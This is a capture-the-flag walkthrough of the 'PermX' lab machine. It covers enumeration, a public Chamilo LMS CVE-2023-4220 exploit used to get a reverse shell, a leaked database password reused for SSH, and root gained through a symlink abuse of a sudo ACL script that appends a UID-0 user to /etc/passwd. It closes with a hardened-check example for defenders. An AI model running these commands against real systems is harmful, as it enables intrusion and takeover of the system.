# PermX

## Nmap Scan

```
$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 10.10.11.23                
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-31 00:58 EDT
Warning: 10.10.11.23 giving up on port because retransmission cap hit (10).
Nmap scan report for permx.htb (10.10.11.23)
Host is up (0.079s latency).
Not shown: 38312 filtered tcp ports (no-response), 27221 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: eLEARNING
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.61 seconds
```

## Initial Access

### Port 80

First, we add the IP to our hosts file.

```
$ echo "10.10.11.23 permx.htb" | sudo tee -a /etc/hosts                                                                               
[sudo] password for kali: 
10.10.11.23 permx.htb
```

When we visit the webpage, we are greeted with this.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FnqiBdnvUKc5yUU5BSX54%2Fimage.png?alt=media&#x26;token=aec3bbf2-18f4-474b-88ee-8b1f56e647bb" alt=""><figcaption></figcaption></figure>

However, reading the page source reveals nothing of interest.

### Subdomain Enumeration

Next we will enumerate the subdomains.

{% code overflow="wrap" %}

```
$ wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.permx.htb" --hw 475 -t 100 10.10.11.23
...
000000477:   200        352 L    940 W      19347 Ch    "lms" 
...
```

{% endcode %}

We can see that the `lms` subdomain returns a status code of 200.

First, we add it to our hosts file as well.

```
$ echo "10.10.11.23 lms.permx.htb" | sudo tee -a /etc/hosts
10.10.11.23 lms.permx.htb
```

After adding to the host file and visiting the URL, we are greeted with this login page.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FaJQSEr5XlrF806TPGHpx%2Fimage.png?alt=media&#x26;token=271e4509-f674-4af3-8536-207b2556a7ba" alt=""><figcaption></figcaption></figure>

### CVE-2023-4220

Searching online for exploits against this application (Chamilo LMS) turns up a publicly available proof of concept.

{% embed url="https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc" %}

```
$ git clone https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc
$ cd chamilo-lms-unauthenticated-big-upload-rce-poc
$ pip install -r requirements.txt
```

Next, we check whether the site is vulnerable.

```
$ python3 main.py -u http://lms.permx.htb -a scan 
```

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FIvADQJySkMFqnwJ5EAij%2Fimage.png?alt=media&#x26;token=ee20fe49-fa78-4081-b0ca-cb05277b6ff1" alt=""><figcaption></figcaption></figure>

Then we run the command to get a reverse shell.

```
$ python3 main.py -u http://lms.permx.htb -a revshell
```

After running it, we should be able to get a reverse shell.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FIRTSZxHJspXKqwG5Y7lN%2Fimage.png?alt=media&#x26;token=ff447200-c147-4526-aef4-241e402d2d33" alt=""><figcaption></figcaption></figure>

### Upgrading shell

To upgrade the shell, we follow [upgrading-shells](https://jasons-organization-25.gitbook.io/security-stuff/boxes-methodology/reverse-shell-payloads/upgrading-shells "mention").

### Password in configuration files

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FeZFEUJxJ8dCFVd8GRhVs%2Fimage.png?alt=media&#x26;token=867c9446-bc10-4985-8236-e829a848bd1d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FVY7Io6zdAvZtF0unwGpy%2Fimage.png?alt=media&#x26;token=781f2bc9-176e-4e9a-83ed-ce678a39788d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FSUZ370FcfRmO71FlGSef%2Fimage.png?alt=media&#x26;token=ec7a5458-e429-4cd4-9cbe-04d73d5ff5ff" alt=""><figcaption></figcaption></figure>

Enumerating with linpeas shows that `configuration.php` contains the database password.

```
/var/www/chamilo/app/config/configuration.php:$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
/var/www/chamilo/app/config/configuration.php:$_configuration['password_encryption'] = 'bcrypt';
03F6lY3uXAP2bkW8
```

We can also see that the username is `mtz`.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2Fyr25xRIEtpIPGwOjTyD6%2Fimage.png?alt=media&#x26;token=4aee8ebb-8a24-4808-9ffc-a1a4c1aa6da3" alt=""><figcaption></figcaption></figure>

With this information, we can log in as `mtz` over SSH.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FwyUibbBqqvPwRompTLUg%2Fimage.png?alt=media&#x26;token=d64bc103-99c7-4565-bfde-70953b7fcea9" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### Running script using sudo

After running `sudo -l`, we see that the user can run the script `/opt/acl.sh` as `root`.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FtP2BUEn3KdktKBIneApP%2Fimage.png?alt=media&#x26;token=bddc734f-8130-479b-bad8-db52b25b7aeb" alt=""><figcaption></figcaption></figure>

This is the content of that script.

```bash
#!/bin/bash

if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
```

The script only changes the ACL when the supplied path starts with `/home/mtz/`, contains no `..`, and is a regular file. The check is applied to the path string, not to the file it resolves to, so a symlink inside the home directory passes it.

We can therefore create a symlink in the home directory that points to `/`.

```
$ ln -s / root
```

From there, we use the script to grant the current user full access to `/etc/passwd` through the symlink.

```
$ sudo /opt/acl.sh mtz rwx /home/mtz/root/etc/passwd
```

With that ACL in place, `/etc/passwd` is writable, so we can append a new user with UID 0.

```
$ openssl passwd 123   # generate a password hash for "123" (the $1$ prefix is MD5-crypt)
$ echo 'user3:$1$4XXWqVcf$oTXWs68MHRnK1b6iNPqDn1:0:0:root:/root:/bin/bash' >> /etc/passwd
```

With that, we can log in as `user3`, which has UID 0 and therefore root access.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2F0KBH7tNYmuhcIBFC2U9Q%2Fimage.png?alt=media&#x26;token=cae7a0ed-8e5c-48f2-8770-17032928c1a3" alt=""><figcaption></figcaption></figure>
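The escalation works because `acl.sh` validates the path string and never resolves symlinks. The following added example (not the box's script and not the author's code) puts that original check next to a hardened version that canonicalises the path with GNU `realpath` before comparing it; both functions take the allowed base directory as a parameter, which is an assumption made so they can be exercised outside `/home/mtz`.

```shell
#!/bin/bash
# Added example, not the box's own script: the path check from /opt/acl.sh next to
# a hardened version. The original compares the *string* "$target" against the
# home-directory prefix, so a symlink such as /home/mtz/root -> / passes the check
# while setfacl operates on the real file behind it. Both functions take the
# allowed base directory as an argument (assumption: callers pass /home/mtz).
# Requires GNU coreutils realpath.

# Original logic: literal prefix match plus a ".." blacklist; symlinks are not resolved.
original_check() {
    local base="$1" target="$2"
    case "$target" in
        *..*) return 1 ;;           # the ".." blacklist
        "$base"/*) ;;               # string prefix only
        *) return 1 ;;
    esac
    [ -f "$target" ]                # -f follows symlinks, so the link target counts
}

# Hardened logic: canonicalise first, compare the resolved path, and refuse symlinks
# outright so that a link swapped in between the check and setfacl cannot help either.
hardened_check() {
    local base="$1" target="$2" real_base real_target
    real_base=$(realpath -e -- "$base" 2>/dev/null) || return 1
    real_target=$(realpath -e -- "$target" 2>/dev/null) || return 1   # resolves symlinks and ".."
    case "$real_target" in
        "$real_base"/*) ;;          # the real file lives under the allowed directory
        *) return 1 ;;
    esac
    [ -L "$target" ] && return 1    # final component is itself a symlink
    [ -f "$real_target" ]
}

# Demo: a scratch home containing a regular file and a symlink to /, as on the box.
demo() {
    local home path o h
    home=$(mktemp -d)
    echo "notes" > "$home/notes.txt"
    ln -s / "$home/root"
    for path in "$home/root/etc/passwd" "$home/notes.txt"; do
        original_check "$home" "$path" && o=allowed || o=denied
        hardened_check "$home" "$path" && h=allowed || h=denied
        printf '%-24s original=%s hardened=%s\n' "${path#"$home"}" "$o" "$h"
    done
    rm -rf "$home"
}
demo
```

Running it prints `allowed` from the original check and `denied` from the hardened one for the symlinked `/etc/passwd`, while the regular file in the home directory is accepted by both.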
